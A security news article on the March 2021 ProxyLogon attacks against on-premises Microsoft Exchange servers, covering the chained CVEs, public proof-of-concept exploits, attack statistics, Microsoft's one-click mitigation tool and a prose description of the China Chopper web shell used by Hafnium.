Exchange Cyber-attacks Increase – Microsoft Launches One-Click Fix!

Exchange Cyber-attacks Increase – Microsoft Launches One-Click Fix!

Public proof-of-concept (PoC) exploits for Proxy Logon could be creating a ‘tsunami’ of attacks just as patching starts to work.

As dangerous attacks increase against Microsoft Exchange Servers after the disclosure around the Proxy Logon group of security bugs, a public proof-of-concept (PoC) debate has started up. It is all leading to a deluge of cyber-activity.

Good news, however, is that Microsoft has issued a 1-click mitigation & remediation tool because of the ongoing swells of attacks.

Advanced Persistent Threats

Researchers commented that while Advanced Persistent Threats (APTs) were the 1st ‘player’ when it comes to hacking vulnerable Exchange servers, the public PoCs mean that it is out there, & that less sophisticated cyber-criminals can start to use this opportunity.

“APTs…can reverse engineer the patches & make their own PoCs,” Roger Grimes, data-driven defence evangelist at KnowBe4, explained.

Level of Sophistication

“But publicly posted PoCs mean that the 1,000s of other hacker groups that don’t have that level of sophistication can do it, & even those groups that do have that sophistication can do it faster.”

After confirming the efficacy of one of the new public PoCs, security researcher Will Dorman of CERT/CC tweeted, “How did I find this exploit?  Hanging out in the dark web?  A hacker forum? No. Google search.”

Exploit Against Microsoft Exchange

Microsoft stated in early March that it had spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange servers.

4 flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) can be chained together to create a pre-authentication remote code execution (RCE) exploit – meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications & the opportunity to install a web shell for further exploitation within the environment.

Also, Microsoft noted that adversaries from a Chinese APT called Hafnium were able to access email accounts, steal a raft of data & drop malware on target machines for long-term remote access.

Patches

Microsoft quickly pushed out out-of-band patches for Proxy Logon, but even so, 10s of 1,000s of organisations have so far been compromised using the exploit chain.

It’s also apparent that Hafnium isn’t the only party of interest, according to multiple researchers; ESET said last week that at least 10 different APTs are using the exploit.

Sheer Volume

The sheer volume of APTs mounting attacks, most of them starting in the days before Proxy Logon became publicly known, has prompted questions as to the exploit’s provenance & ESET researchers mused whether it was shared around the Dark Web on a wide scale.

Several versions of the on-premises flavour of Exchange are vulnerable to the 4 bugs, including Exchange 2013, 2016 and 2019. Cloud-based & hosted versions are not vulnerable to Proxy Logon.

How Many Organisations at Risk?

Microsoft originally identified more than 400,000 on-premises Exchange servers that were at-risk when the patches were 1st released on March 2. Data collected by RiskIQ indicated that as of Mar. 14, there were 69,548 Exchange servers that were still vulnerable. In a separate analysis from Kryptos Logic, 62,018 servers are still vulnerable to CVE-2021-26855, the server-side request forgery flaw that allows initial access to Exchange servers.

“We released 1 additional set of updates on Mar. 11, and with this, we have released updates covering more than 95% of all versions exposed on the internet,” according to post published by Microsoft last week.

Exploitation Attempts

However, Check Point Research (CPR) said this week that in its latest observations on exploitation attempts, the number of attempted attacks has increased 10x, from 700 on Mar. 11 to more than 7,200 on Mar. 15.

According to CPR’s telemetry, the most-attacked country has been the US (17% of all exploit attempts), followed by Germany (6%), the UK (5%), the Netherlands (5%) & Russia (4%).

The most-targeted industry sector meanwhile has been govt./military (23% of all exploit attempts), followed by manufacturing (15%), banking & financial services (14%), software vendors (7%) & healthcare (6%).

Numbers are Falling

“While the numbers are falling, they’re not falling fast enough,” RiskIQ suggested in its post.

“If you have an Exchange server unpatched & exposed to the internet, your organisation is likely already breached. One reason the response may be so slow is many organisations may not realise they have exchange servers exposed to the Internet—this is a common issue we see with new customers.”

It added, “Another is that while new patches are coming out every day, many of these servers are not patchable and require upgrades, which is a complicated fix and will likely spur many organisations to migrate to cloud email.”

Will these Attacks Get Worse?

Unfortunately, it is likely that attacks on Exchange servers will become more voluminous. Last week, independent Security Researcher Nguyen Jang published a PoC on GitHub, which chained 2 of the Proxy Logon vulnerabilities together.

GitHub quickly took it down in light of the 100s of 1,000s of still-vulnerable machines in use, but it was still available for several hours.

Then over the weekend, another PoC appeared, flagged & confirmed by CERT/CC’s Dormann:

Well, I will say that the Proxy Logon Exchange CVE-2021-26855 Exploit is completely out of the bag by now.https://t.co/ubsysTeFOj
I’m not so sure about the “Failed to write to shell” error message. But I can confirm that it did indeed drop a shell on my test Exchange 2016 box. pic.twitter.com/ijOGx3BIif

— Will Dormann (@wdormann) March 13, 2021

Praetorian Researchers

Earlier, Praetorian researchers on Mar. 8 published a detailed technical analysis of CVE-2021-26855 (the 1 used for initial access), which it used to create an exploit. The technical details offer a public roadmap for reverse-engineering the patch.

The original exploit used by APTs meanwhile could have been leaked or lifted from Microsoft’s information-sharing program, according to a recent report in the Wall Street Journal.

In light of evidence that multiple APTs were mounting zero-day attacks in the days before Microsoft released patches for the bugs, the computing giant is reportedly questioning whether an exploit was leaked from 1 of its security partners.

Bug Information

MAPP delivers relevant bug information to security vendors ahead of disclosure, so they can get a jump on adding signatures & indicators of compromise to their products & services. This can include, yes, exploit code.

“Some of the tools used in the 2nd wave of the attack, which is believed to have begun Feb. 28, bear similarities to proof-of-concept attack code that Microsoft distributed to antivirus companies & other security partners Feb. 23, investigators at security companies say,” according to the report.

“Microsoft had planned to release its security fixes 2 weeks later, on Mar. 9, but after the 2nd wave began it pushed out the patches a week early, on Mar. 2, according to researchers.”

Mitigation Tool

Microsoft has released an Exchange On-premises Mitigation Tool (EOMT) tool to help smaller businesses without dedicated security teams to protect themselves.

“Microsoft has released a new, one-click mitigation tool, Microsoft Exchange On-Premises Mitigation Tool to help customers who do not have dedicated security or IT teams to apply these security updates. We have tested this tool across Exchange Server 2013, 2016, & 2019 deployments,” according to a post published by Microsoft.

“This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.”

Microsoft explained that the tool will mitigate against exploits for the initial-access bug CVE-2021-26855 via a URL rewrite configuration, & will also scan the server using the Microsoft Safety Scanner to identify any existing compromises. Then, it will remediate those.

China Chopper

Amid this flurry of activity, more is becoming known about how the attacks work. For instance, the APT Hafnium first flagged by Hafnium is uploading the well-known China Chopper web shell to victim machines.

That’s according to an analysis from Trustwave SpiderLabs, which found that China Chopper is specifically being uploaded to compromised Microsoft Exchange servers with a publicly facing Internet Information Services (IIS) web server.

Web Shell

China Chopper is an Active Server Page Extended (ASPX) web shell that is typically planted on an IIS or Apache server through an exploit. When established, the backdoor — which hasn’t been altered much since its inception nearly a decade ago — allows adversaries to execute various commands on the server, drop malware & more.

“While the China Chopper web shell has been around for years, we decided to dig even deeper into how the China Chopper web shell works as well as how the ASP.NET runtime serves these web shells,” according to Trustwave. “The China Chopper server-side ASPX web shell is extremely small & typically, the entire thing is just 1 line.”

Hafnium is using the JScript version of the web shell, researchers added.

HTTP POST

“The script is essentially a page where when an HTTP POST request is made to the page, & the script will call the JScript ‘eval’ function to execute the string inside a given POST request variable,” researchers explained.

“In the…script, the POST request variable is named ‘secret,’ meaning any JScript contained in the ‘secret’ variable will be executed on the server.”

C Binary File

Researchers added that typically, a China Chopper client component in the form of a C binary file is used on the attacker’s systems.

“This client allows the attacker to perform many nefarious tasks such as downloading & uploading files, running a virtual terminal to execute anything you normally could using cmd.exe, modifying file times, executing custom JScript, file browsing and more,” explained Trustwave researchers.

“All this is made available just from the one line of code running on the server.”

https://www.cybernewsgroup.co.uk/virtual-conference-april-2021/

 

SHARE ARTICLE